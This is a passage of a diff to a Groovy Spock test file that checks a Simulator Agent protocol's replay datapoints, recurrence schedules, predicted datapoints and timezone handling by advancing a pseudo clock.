+      getDatapointTimestamp(attribute2) == DAY_IN_MILLIS + HOUR_IN_MILLIS
     }
 
-    def "Check Simulator Agent protocol adds predicted datapoints for the current and next occurrence"() {
-        when: "replayData is configured to add a datapoint in 1 and 2 hours every day"
-        asset.addOrReplaceAttributes(new Attribute<>("test6", ValueType.TEXT).addMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test"),
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        // We manually set the schedule so it starts when we want, as AgentLinks don't have access to the timer service
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, "FREQ=DAILY"
-                ))),
-                new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test6").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    and: "the first attribute still has only its own datapoint"
+    assetDatapointService.getDatapoints(attributeRef1).size() == 1
+  }
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
+  def "Check Simulator Agent protocol with replay startDate"() {
+    when: "replayData is configured to replay in 1day and 1hr"
+    asset.addOrReplaceAttributes(new Attribute<>("test3", ValueType.TEXT)
+            .addMeta(new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                    new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                    new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 25, "test"),
+                    new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 49, "test")
+                    ).setSchedule(new SimulatorProtocol.Schedule(
+                    LocalDateTime.ofInstant(Instant.parse("1970-01-02T00:00:00.000Z"), ZoneOffset.UTC), null, null
+                    ))
+            )))
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test3").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
 
-        (1..2).each { i ->
-            and: "the delay is 1 hour"
-            conditions.eventually {
-                scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
-            }
-
-            and: "the predicted datapoints are present"
-            conditions.eventually {
-                def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-                datapoints.size() == 4
-                datapoints.get(3).getTimestamp() == HOUR_IN_MILLIS * 1
-                datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 2
-                datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 25
-                datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 26
-            }
-
-            when: "fast forward 1 hour"
-            advancePseudoClock(1, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoint is present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == i * HOUR_IN_MILLIS
-            }
-        }
-
-        and: "the predicted datapoints are present"
-        def datapoints1 = assetPredictedDatapointService.getDatapoints(attributeRef)
-        datapoints1.size() == 3
-        datapoints1.get(2).getTimestamp() == HOUR_IN_MILLIS * 2 // Still present because condition is before (time is equal)
-        datapoints1.get(1).getTimestamp() == HOUR_IN_MILLIS * 25
-        datapoints1.get(0).getTimestamp() == HOUR_IN_MILLIS * 26
-
-        and: "the delay is 1 day and -1 hour"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == DAY_IN_MILLIS - HOUR_IN_MILLIS
-        }
-
-        when: "fast forward 1 day and 1 hour"
-        advancePseudoClock(1, DAYS, container)
-        advancePseudoClock(-1, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "datapoint is present"
-        conditions.eventually {
-            getDatapointTimestamp(attribute) == DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        and: "the predicted datapoints are present"
-        def datapoints2 = assetPredictedDatapointService.getDatapoints(attributeRef)
-        datapoints2.size() == 2
-        datapoints2.get(1).getTimestamp() == HOUR_IN_MILLIS * 25
-        datapoints2.get(0).getTimestamp() == HOUR_IN_MILLIS * 26
-
-        when: "reset agentLink"
-        attribute.addOrReplaceMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId())),
-        )
-        assetStorageService.merge(asset)
-
-        then: "purge datapoints"
-        conditions.eventually {
-            assetPredictedDatapointService.getDatapoints(attributeRef).size() == 0
-        }
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
     }
 
-    def "Check Simulator Agent protocol adds predicted datapoints for one-time occurrence"() {
-        when: "replayData is configured to add a datapoint in 1 and 2 hours"
-        asset.addOrReplaceAttributes(new Attribute<>("test7", ValueType.TEXT).addMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test"),
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, null
-                ))),
-                new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test7").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
-
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
-
-        and: "the delay is 1 hour"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
-        }
-
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 1
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 2
-        }
-
-        when: "fast forward 1 hour"
-        advancePseudoClock(1, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 1
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 2
-        }
+    and: "the delay is 25 hours"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == DAY_IN_MILLIS + HOUR_IN_MILLIS
     }
 
-    def "Check Simulator Agent protocol adds predicted datapoints recurringly until"() {
-        when: "replayData is configured to add a datapoint in 1, 2, and 3 hours and cutoff at 4 hours"
-        asset.addOrReplaceAttributes(new Attribute<>("test7", ValueType.TEXT).addMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 3, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 4, "test"),
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC),
-                        null,
-                        "FREQ=DAILY;UNTIL=19700101T030000"
-                ))),
-                new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test7").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    when: "fast forward 1 day and 1 hour"
+    advancePseudoClock(1, DAYS, container)
+    advancePseudoClock(1, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
-
-        and: "the delay is 1 hour"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
-        }
-
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.size() == 3
-            datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 1
-            datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 2
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 3
-        }
+    then: "datapoint is present"
+    conditions.eventually {
+      getDatapointTimestamp(attribute) == DAY_IN_MILLIS + HOUR_IN_MILLIS
     }
 
-    def "Check Simulator Agent protocol adds predicted datapoints recurringly for Europe/Amsterdam timezone"() {
-        when: "replayData is configured to add 3 datapoints every day until the 2nd at 1 for Europe/Amsterdam timezone"
-        asset.addOrReplaceAttributes(new Attribute<>("test7", ValueType.TEXT).addMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 12, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 24, "test"),
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC),
-                        null,
-                        "FREQ=DAILY;UNTIL=19700102T010000"
-                )).setTimezone(TimeZone.getTimeZone("Europe/Amsterdam"))),
-                new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test7").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    // Starting at 2 days, because start date + first datapoint = 2 days since epoch
+    (2..3).each { i ->
+      def days = i * DAY_IN_MILLIS // Starts at 2 days, increments with 1 day
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
+      and: "the delay is 24 hours"
+      conditions.eventually {
+        scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 24
+      }
 
-        and: "the delay is 11 hours"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 11
-        }
+      when: "fast forward 24 hours"
+      advancePseudoClock(24, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
 
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.size() == 3
-            datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 11
-            datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 23
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24
-        }
-
-        when: "fast forward 11 hours"
-        advancePseudoClock(11, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "the delay is 12 hours"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 12
-        }
-
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.size() == 3
-            datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 11
-            datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 23
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24
-        }
-
-        when: "fast forward 12 hours"
-        advancePseudoClock(12, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "the delay is 1 hour"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
-        }
-
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.size() == 2
-            datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 23
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24
-        }
-
-        when: "fast forward 1 hours"
-        advancePseudoClock(1, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "the delay is 11 hours"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 11
-        }
-
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.size() == 1
-            datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24 // Last datapoint on the 2nd but -1 because CET
-        }
-
-        when: "fast forward 11 hours"
-        advancePseudoClock(11, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "nothing is scheduled anymore because the recurrence ended"
-        conditions.eventually {
-            scheduledFor(attributeRef) == null
-        }
-
-        and: "the predicted datapoints are present"
-        conditions.eventually {
-            def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
-            datapoints.size() == 0
-        }
+      then: "datapoint is present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS
+      }
     }
+
+    and: "attribute is removed from replay map"
+    conditions.eventually {
+      protocol.replayMap.get(attributeRef) == null
+    }
+  }
+
+  def "Check Simulator Agent protocol with custom recurrence schedule"() {
+    when: "replayData is configured to add a datapoint in 1hr, and 2hrs weekly on Mondays"
+    asset.addOrReplaceAttributes(new Attribute<>("test5", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test")
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            // First day should be 1970-01-05 (in 4 days) a Monday
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-05T00:00:00.000Z"), ZoneOffset.UTC),
+                            null,
+                            // Recur every Monday until 1970-01-31
+                            "FREQ=WEEKLY;UNTIL=19700131T000000;BYDAY=MO"
+                            ))
+                    )))
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test5").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
+    }
+
+    then: "the delay is 4 days and 1 hour"
+    conditions.eventually {
+      Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-01T00:00:00.000Z")
+      scheduledFor(attributeRef)?.delay == 4 * DAY_IN_MILLIS + HOUR_IN_MILLIS
+    }
+
+    when: "fast forward 4 days and 1 hour"
+    advancePseudoClock(4, DAYS, container)
+    advancePseudoClock(1, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "datapoint is present"
+    conditions.eventually {
+      getDatapointTimestamp(attribute) == 4 * DAY_IN_MILLIS + HOUR_IN_MILLIS
+    }
+
+    (0..2).each { i ->
+      def weeks = i * WEEK_IN_MILLIS // Starts at 0 weeks, increments with 1 week
+      def firstWeekOffset = 4 * DAY_IN_MILLIS
+
+      and: "the delay is 1 hour"
+      conditions.eventually {
+        Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-05T01:00:00.000Z").plusMillis(weeks)
+        scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
+      }
+
+      when: "fast forward 1 hour"
+      advancePseudoClock(1, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+      then: "datapoint is present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == firstWeekOffset + weeks + 2 * HOUR_IN_MILLIS
+      }
+
+      and: "the delay is 1 week and -1 hour"
+      conditions.eventually {
+        Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-05T02:00:00.000Z").plusMillis(weeks)
+        scheduledFor(attributeRef)?.delay == WEEK_IN_MILLIS - HOUR_IN_MILLIS
+      }
+
+      when: "fast forward 1 week and -1 hour"
+      advancePseudoClock(7, DAYS, container)
+      advancePseudoClock(-1, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+      then: "datapoint is present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == firstWeekOffset + WEEK_IN_MILLIS + weeks + HOUR_IN_MILLIS
+      }
+    }
+
+    when: "fast forward past the end date"
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "the attributeRef should be present"
+    conditions.eventually {
+      Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-26T01:00:00Z") // Last monday
+      protocol.replayMap.get(attributeRef) != null
+    }
+
+    when: "fast forward 5 days and -1 hour"
+    advancePseudoClock(5, DAYS, container)
+    advancePseudoClock(-1, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually
+
+    then: "the attributeRef is removed from the replayMap"
+    conditions.eventually {
+      Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-31T00:00:00Z") // Ends here
+      protocol.replayMap.get(attributeRef) == null
+    }
+  }
+
+  def "Check Simulator Agent protocol adds predicted datapoints for the current and next occurrence"() {
+    when: "replayData is configured to add a datapoint in 1 and 2 hours every day"
+    asset.addOrReplaceAttributes(new Attribute<>("test6", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test"),
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            // We manually set the schedule so it starts when we want, as AgentLinks don't have access to the timer service
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, "FREQ=DAILY"
+                            ))),
+                    new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test6").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
+    }
+
+    (1..2).each { i ->
+      and: "the delay is 1 hour"
+      conditions.eventually {
+        scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
+      }
+
+      and: "the predicted datapoints are present"
+      conditions.eventually {
+        def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+        datapoints.size() == 4
+        datapoints.get(3).getTimestamp() == HOUR_IN_MILLIS * 1
+        datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 2
+        datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 25
+        datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 26
+      }
+
+      when: "fast forward 1 hour"
+      advancePseudoClock(1, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+      then: "datapoint is present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == i * HOUR_IN_MILLIS
+      }
+    }
+
+    and: "the predicted datapoints are present"
+    def datapoints1 = assetPredictedDatapointService.getDatapoints(attributeRef)
+    datapoints1.size() == 3
+    datapoints1.get(2).getTimestamp() == HOUR_IN_MILLIS * 2 // Still present because condition is before (time is equal)
+    datapoints1.get(1).getTimestamp() == HOUR_IN_MILLIS * 25
+    datapoints1.get(0).getTimestamp() == HOUR_IN_MILLIS * 26
+
+    and: "the delay is 1 day and -1 hour"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == DAY_IN_MILLIS - HOUR_IN_MILLIS
+    }
+
+    when: "fast forward 1 day and 1 hour"
+    advancePseudoClock(1, DAYS, container)
+    advancePseudoClock(-1, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "datapoint is present"
+    conditions.eventually {
+      getDatapointTimestamp(attribute) == DAY_IN_MILLIS + HOUR_IN_MILLIS
+    }
+
+    and: "the predicted datapoints are present"
+    def datapoints2 = assetPredictedDatapointService.getDatapoints(attributeRef)
+    datapoints2.size() == 2
+    datapoints2.get(1).getTimestamp() == HOUR_IN_MILLIS * 25
+    datapoints2.get(0).getTimestamp() == HOUR_IN_MILLIS * 26
+
+    when: "reset agentLink"
+    attribute.addOrReplaceMeta(
+            new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId())),
+            )
+    assetStorageService.merge(asset)
+
+    then: "purge datapoints"
+    conditions.eventually {
+      assetPredictedDatapointService.getDatapoints(attributeRef).size() == 0
+    }
+  }
+
+  def "Check Simulator Agent protocol adds predicted datapoints for one-time occurrence"() {
+    when: "replayData is configured to add a datapoint in 1 and 2 hours"
+    asset.addOrReplaceAttributes(new Attribute<>("test7", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test"),
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, null
+                            ))),
+                    new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test7").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
+    }
+
+    and: "the delay is 1 hour"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 1
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 2
+    }
+
+    when: "fast forward 1 hour"
+    advancePseudoClock(1, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 1
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 2
+    }
+  }
+
+  def "Check Simulator Agent protocol adds predicted datapoints recurringly until"() {
+    when: "replayData is configured to add a datapoint in 1, 2, and 3 hours and cutoff at 4 hours"
+    asset.addOrReplaceAttributes(new Attribute<>("test7", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 3, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 4, "test"),
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC),
+                            null,
+                            "FREQ=DAILY;UNTIL=19700101T030000"
+                            ))),
+                    new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test7").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
+    }
+
+    and: "the delay is 1 hour"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.size() == 3
+      datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 1
+      datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 2
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 3
+    }
+  }
+
+  def "Check Simulator Agent protocol adds predicted datapoints recurringly for Europe/Amsterdam timezone"() {
+    when: "replayData is configured to add 3 datapoints every day until the 2nd at 1 for Europe/Amsterdam timezone"
+    asset.addOrReplaceAttributes(new Attribute<>("test7", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 12, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 24, "test"),
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC),
+                            null,
+                            "FREQ=DAILY;UNTIL=19700102T010000"
+                            )).setTimezone(TimeZone.getTimeZone("Europe/Amsterdam"))),
+                    new MetaItem<>(HAS_PREDICTED_DATA_POINTS, true))
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test7").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
+    }
+
+    and: "the delay is 11 hours"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 11
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.size() == 3
+      datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 11
+      datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 23
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24
+    }
+
+    when: "fast forward 11 hours"
+    advancePseudoClock(11, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "the delay is 12 hours"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 12
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.size() == 3
+      datapoints.get(2).getTimestamp() == HOUR_IN_MILLIS * 11
+      datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 23
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24
+    }
+
+    when: "fast forward 12 hours"
+    advancePseudoClock(12, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "the delay is 1 hour"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.size() == 2
+      datapoints.get(1).getTimestamp() == HOUR_IN_MILLIS * 23
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24
+    }
+
+    when: "fast forward 1 hours"
+    advancePseudoClock(1, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "the delay is 11 hours"
+    conditions.eventually {
+      scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 11
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
+      def datapoints = assetPredictedDatapointService.getDatapoints(attributeRef)
+      datapoints.size() == 1
+      datapoints.get(0).getTimestamp() == HOUR_IN_MILLIS * 24 // Last datapoint on the 2nd but -1 because CET
+    }
+
+    when: "fast forward 11 hours"
+    advancePseudoClock(11, HOURS, container)
+    scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+    then: "nothing is scheduled anymore because the recurrence ended"
+    conditions.eventually {
+      scheduledFor(attributeRef) == null
+    }
+
+    and: "the predicted datapoints are present"
+    conditions.eventually {
